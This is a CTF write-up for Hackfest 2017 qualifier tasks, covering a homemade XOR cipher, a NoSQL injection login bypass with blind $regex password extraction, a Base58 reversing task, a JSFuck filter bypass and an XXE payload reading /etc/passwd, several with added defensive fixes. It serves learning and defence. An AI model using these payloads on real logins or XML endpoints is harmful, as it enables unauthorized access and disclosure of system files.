Hackfest{2k17_online_Quals_writeUps}

1:45:00 PM Unknown 0 Comments


Crypto, 1 pt

My agent intercepted the following message.

4b4241494f4c5e594251471a67196e1e751958495a531a1d58135a1e73621b757559191319641e58664675731a411f646e1b78196e191d75751a19686775581a7519787a441a75191a1d4875137f0b590b0b7d
 

It is encrypted using a homemade cryptographic algorithm! He also managed to find which server encrypted the message!
You can access it from: nc challenge.hackfest.tn 3001. Can you decrypt the message for us?

The server reads the user input, encrypts it and returns a hex string. Rather than guessing the next byte by hand over nc, we sent the server every printable character, recorded the hex byte each one came back as, and wrote a second script that uses that table to decrypt the message. The server also swaps every pair of characters, which is why the script reads the ciphertext two bytes at a time and puts each pair back in its original order.

#!/usr/bin/env python
# Crypto 1
# Every printable character from '!' to '}', in order
ch = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}"
# c[i] is the hex byte the server returned when we sent ch[i]
c = ['0b', '08', '09', '0e', '0f', '0c', '0d', '02', '03', '00', '01', '06', '07', '04', '05', '1a', '1b', '18', '19', '1e', '1f', '1c', '1d', '12', '13', '10', '11', '16', '17', '14', '15', '6a', '6b', '68', '69', '6e', '6f', '6c', '6d', '62', '63', '60', '61', '66', '67', '64', '65', '7a', '7b', '78', '79', '7e', '7f', '7c', '7d', '72', '73', '70', '71', '76', '77', '74', '75', '4a', '4b', '48', '49', '4e', '4f', '4c', '4d', '42', '43', '40', '41', '46', '47', '44', '45', '5a', '5b', '58', '59', '5e', '5f', '5c', '5d', '52', '53', '50', '51', '56', '7d']
# The intercepted message (the hex string above), split into bytes
secret_hex = ("4b4241494f4c5e594251471a67196e1e751958495a531a1d58135a1e73621b757559191319641e5866467"
              "5731a411f646e1b78196e191d75751a19686775581a7519787a441a75191a1d4875137f0b590b0b7d")
secret = [secret_hex[i:i + 2] for i in range(0, len(secret_hex), 2)]
# Invert the harvested table: ciphertext byte -> plaintext character
table = dict(zip(c, ch))
flag = ""
# The server swaps every pair of characters, so read two bytes at a time
# and emit them in the original order
for j in range(0, len(secret) - 1, 2):
    flag += table[secret[j + 1]]
    flag += table[secret[j]]
if len(secret) % 2:          # odd length: the last byte has no partner
    flag += table[secret[-1]]
print(flag)
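Querying the server for every character works, but the harvested table also gives the cipher away: every entry but the last is the plaintext character XORed with 0x2a, and characters are swapped in pairs. The script below is an added example, not part of the original write-up: it recovers that key byte from the known flag prefix alone (a known-plaintext attack) and decrypts the intercepted message without touching the server. Two points are assumptions inferred from the table rather than stated on the page: that one key byte is applied to every character, and that an unpaired trailing byte is passed through unchanged (the table maps '}' to 7d, which is also the last byte of the message).

```python
# Added example (not the write-up's script): known-plaintext recovery of the
# homemade cipher.  Assumed cipher model, inferred from the harvested table:
#   ciphertext = swap_pairs(plaintext) XOR key_byte, with an odd trailing
#   byte left untouched.
CIPHERTEXT_HEX = (
    "4b4241494f4c5e594251471a67196e1e751958495a531a1d58135a1e73621b757559191319641e5866467"
    "5731a411f646e1b78196e191d75751a19686775581a7519787a441a75191a1d4875137f0b590b0b7d"
)
KNOWN_PREFIX = b"hackfest{"   # every flag in this CTF starts like this


def unswap(data):
    """Undo the pairwise swap; an odd final byte has no partner and stays put."""
    out = bytearray(data)
    for i in range(0, len(data) - 1, 2):
        out[i], out[i + 1] = data[i + 1], data[i]
    return bytes(out)


def recover_key(ct, known):
    """Single-byte XOR key implied by a known plaintext prefix.
    Returns None when the positions disagree, i.e. the model is wrong."""
    keys = {c ^ p for c, p in zip(unswap(ct), known)}
    return keys.pop() if len(keys) == 1 else None


def decrypt(ct, key):
    plain = bytearray(unswap(ct))
    paired = len(plain) - len(plain) % 2     # leave an unpaired last byte alone
    for i in range(paired):
        plain[i] ^= key
    return bytes(plain)


def solve(ct_hex=CIPHERTEXT_HEX, known=KNOWN_PREFIX):
    ct = bytes.fromhex(ct_hex)
    key = recover_key(ct, known)
    if key is None:
        raise ValueError("no single-byte XOR key fits the known prefix")
    return key, decrypt(ct, key)


if __name__ == "__main__":
    key, flag = solve()
    print("key byte: 0x%02x" % key)
    print(flag.decode())
```

If recover_key() returns None the guessed prefix or the single-byte model is wrong; with this message all nine prefix positions agree on one key, which is as much confirmation as a single-byte XOR can give.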
 


Web, 1 pt
At first sight the task looks weird: nothing works and there is no response from the server. Maybe a blind SQL injection? No, nothing special there. We ran a fuzzer over usernames and passwords and got this message for username = test and password = test:





Now we are sure the vulnerability is in the database layer and that the username is "admin". After trying a few tricks we tested for NoSQL injection, and there is the flag! [This reminds me of the IceCTF task.]
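The post does not show the payload. What follows is an added example, not the challenge's code, of how a login that forwards a JSON body straight into a MongoDB-style query is bypassed and how to fix it. The in-memory query evaluator, the stored "admin" record and its password are constructed here; the $ne operator payload and the $regex extraction loop are the textbook NoSQL injection techniques and are an assumption about what was used against the challenge.

```python
# Added example, not the challenge's code.  A tiny evaluator for the subset of
# MongoDB query operators the attack needs, a vulnerable login beside a fixed
# one, and blind password extraction through the vulnerable one.
import re

USERS = [{"username": "admin", "password": "hunter2!"}]   # constructed record


def _match_value(actual, expected):
    """MongoDB-style matching: a dict is an operator object, anything else is equality."""
    if isinstance(expected, dict):
        for op, arg in expected.items():
            if op == "$ne":
                if actual == arg:
                    return False
            elif op == "$gt":
                if not (isinstance(actual, str) and actual > arg):
                    return False
            elif op == "$regex":
                if not (isinstance(actual, str) and re.search(arg, actual)):
                    return False
            else:
                raise ValueError("unsupported operator " + op)
        return True
    return actual == expected


def find_one(query):
    for doc in USERS:
        if all(_match_value(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def login_vulnerable(body):
    """Passes the decoded JSON straight into the query: a dict becomes an operator."""
    return find_one({"username": body.get("username"),
                     "password": body.get("password")}) is not None


def login_fixed(body):
    """Only scalar strings may reach the query; anything else is rejected."""
    u, p = body.get("username"), body.get("password")
    if not (isinstance(u, str) and isinstance(p, str)):
        return False
    return find_one({"username": u, "password": p}) is not None


def extract_password(login):
    """Blind extraction with $regex: grow a prefix one character at a time using
    the login's true/false answer.  Yields nothing against the fixed login."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789!_"
    known = ""
    while True:
        for ch in alphabet:
            probe = {"username": "admin",
                     "password": {"$regex": "^" + re.escape(known + ch)}}
            if login(probe):
                known += ch
                break
        else:
            return known


if __name__ == "__main__":
    bypass = {"username": "admin", "password": {"$ne": ""}}
    print("vulnerable:", login_vulnerable(bypass))
    print("fixed:     ", login_fixed(bypass))
    print("extracted: ", extract_password(login_vulnerable))
```

The fix is a type check rather than escaping: there is nothing to escape in a JSON document, the problem is that the query builder accepts objects where it expects strings.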



Rev, 1 pt
The task is a Python script whose source has been obfuscated with ROT13 (note the coding declaration on the second line):


#!/usr/bin/env python
# -*- coding: rot13 -*-

#import sys

o = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'.qrpbqr("rot13")

vs olgrf == fge:
    vd = ynzoqn f: znc(beq, f)
    od = ynzoqn f: ''.wbva(znc(pue, f))
    ohssre = ynzoqn f: f

qrs r(i):

    by = yra(i)
    i = i.yfgevc(o'\0')
    ay = yra(i)

    c, k = 1, 0
    sbe p va vd(i[::-1]):
        k += c * p
        c = c << 8

    e = ''
    juvyr k > 0:
        k, z = qvizbq(k, 58)
        e += o[z]

    erghea (e + o[0] * (by - ay))[::-1]


cevag 'Flag:',
synt = enj_vachg()
vs r(synt) == "2GYhdiSLoJTRvASGXjIHtatb9Kdr":
    cevag ":)"
ryfr:
    cevag ":("

 


Apply ROT13 to the whole file, which is what the coding declaration makes the Python 2 interpreter do before compiling it (the shebang, the comments and the string literals get scrambled in the process, but the logic becomes readable):


#!/hfe/ova/rai clguba
# -*- pbqvat: ebg13 -*-

#vzcbeg flf

b = '123456789NOPQRSTUWXYZACDEFGHIJKLMnopqrstuvwxzabcdefghijklm'.decode("ebg13")

if bytes == str:
    iq = lambda s: map(ord, s)
    bq = lambda s: ''.join(map(chr, s))
    buffer = lambda s: s

def e(v):

    ol = len(v)
    v = v.lstrip(b'\0')
    nl = len(v)

    p, x = 1, 0
    for c in iq(v[::-1]):
        x += p * c
        p = p << 8

    r = ''
    while x > 0:
        x, m = divmod(x, 58)
        r += b[m]

    return (r + b[0] * (ol - nl))[::-1]


print 'Synt:',
flag = raw_input()
if e(flag) == "2TLuqvFYbWGEiNFTKwVUgngo9Xqe":
    print ":)"
else:
    print ":("


 
After some analysis: e() strips leading NUL bytes from the input, packs the remaining bytes into one big integer (first byte most significant), repeatedly divmod()s that integer by 58 and appends the character of b at each remainder, pads with b[0] once per stripped leading byte, and finally reverses the string. b is the 58-character Base58 alphabet (digits and letters without 0, O, I and l), so e() is plain Base58 encoding, and the check compares the encoding of our input against a fixed string. Decoding that string gives the flag.




Googling the function turned up this Base58 implementation; its decoder gets us the flag.

import codecs

# 58 character alphabet used (Bitcoin Base58).  The target string below was
# taken from the ROT13-encoded file, so the alphabet is ROT13'd to match.
alphabet = codecs.encode('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz', "rot13")


def b58encode(v):
    """Encode bytes v as a Base58 string."""
    origlen = len(v)
    v = v.lstrip(b'\0')
    newlen = len(v)

    # Pack the bytes into one big integer, least significant byte first
    p, acc = 1, 0
    for c in v[::-1]:
        acc += p * c
        p = p << 8

    # Peel off base-58 digits, least significant first
    result = ''
    while acc > 0:
        acc, mod = divmod(acc, 58)
        result += alphabet[mod]

    # Each stripped leading NUL becomes a leading alphabet[0]; then reverse
    return (result + alphabet[0] * (origlen - newlen))[::-1]


def b58decode(v):
    """Decode a Base58 string v back into bytes."""
    if not isinstance(v, str):
        v = v.decode('ascii')

    origlen = len(v)
    v = v.lstrip(alphabet[0])
    newlen = len(v)

    # Rebuild the big integer from the base-58 digits
    p, acc = 1, 0
    for c in v[::-1]:
        acc += p * alphabet.index(c)
        p *= 58

    # Split it back into bytes, least significant first
    result = []
    while acc > 0:
        acc, mod = divmod(acc, 256)
        result.append(mod)

    return (bytes(result) + b'\0' * (origlen - newlen))[::-1]


val = b'i'
print('Input:\t', val)
print('encode', b58encode(val))
print('Base58:\t', b58decode("2GYhdiSLoJTRvASGXjIHtatb9Kdr"))
 

The flag is: hackfest{it_was_b58}

PWN, 1 pt
The task accepts only a few characters; the allowed ones are 0123456789.+-/%*<>!=[]() .
Since []()!+ is enough to write any JavaScript, we can read the flag; we used the online tool JSFuck (http://www.jsfuck.com/) to encode the payload with just those six characters.


and the flag is !



Web, 10 pt
The request sent to the server is XML, so an XXE (XML external entity) vulnerability is the obvious guess, similar to the root-me task. We ran the same tests: declare an external entity and reference it in the request so that its content is echoed back. The request body has to be URL-encoded; our first request read /etc/passwd.




Let's now read the flag!



hackfest{XML_1s_l1k3_vi0l3nc3_1f_1t_d0e5n_T_s0lv3_y0ur_prOblem_y0U_re_n0t_us1n9_en0uGh_0f_iT}
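The payload shape described above, the URL-encoding step it needs when it travels in a form parameter, and the check a defender would put in front of the parser, as an added example that is not the challenge's code. The element names (data, name) and the form field name are assumptions; the file path is the one the write-up requested. The hardening shown is the strict option for untrusted input: refuse any document that carries a DTD at all, detected through expat's declaration callbacks so nothing is ever fetched.

```python
# Added example, not the challenge's code: an XXE payload, its URL-encoded form,
# and a DTD check that rejects it before a real parser sees it.
import urllib.parse
import xml.parsers.expat
import xml.etree.ElementTree as ET

# Constructed payload: declare an external entity pointing at a local file and
# reference it where the application echoes user input back.
XXE_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE data [\n'
    '  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
    ']>\n'
    '<data><name>&xxe;</name></data>'
)

BENIGN = '<?xml version="1.0"?><data><name>test</name></data>'


def encode_for_form(xml_doc, field="xml"):
    """URL-encode the document for a form body ('<', '&' and '"' would otherwise break it)."""
    return urllib.parse.urlencode({field: xml_doc})


def find_dtd(xml_doc):
    """Return (doctype_name, [(entity_name, system_id), ...]) for any DTD in the
    document, or (None, []) if it has none.  Only declaration callbacks are used,
    so no entity is resolved or fetched."""
    found = {"doctype": None, "entities": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        found["doctype"] = name

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        # sysid is set only for external (SYSTEM/PUBLIC) entities
        found["entities"].append((name, sysid))

    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    try:
        p.Parse(xml_doc, True)
    except xml.parsers.expat.ExpatError:
        pass  # malformed input is rejected by the caller anyway; keep what was seen
    return found["doctype"], found["entities"]


def parse_untrusted(xml_doc):
    """Hardened parse: refuse documents that carry a DTD, then parse normally."""
    doctype, entities = find_dtd(xml_doc)
    if doctype is not None:
        raise ValueError("DTD not allowed (doctype %r, entities %r)" % (doctype, entities))
    return ET.fromstring(xml_doc)


if __name__ == "__main__":
    print(encode_for_form(XXE_PAYLOAD))
    print(find_dtd(XXE_PAYLOAD))
    print(parse_untrusted(BENIGN).find("name").text)
```

Rejecting every DTD is blunter than disabling entity resolution in the parser, but it does not depend on which parser library (and which of its defaults) sits behind the endpoint.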

Misc, 1 pt
Do we really need a write-up for this one?! :p Just submit the flag XD!
For 10
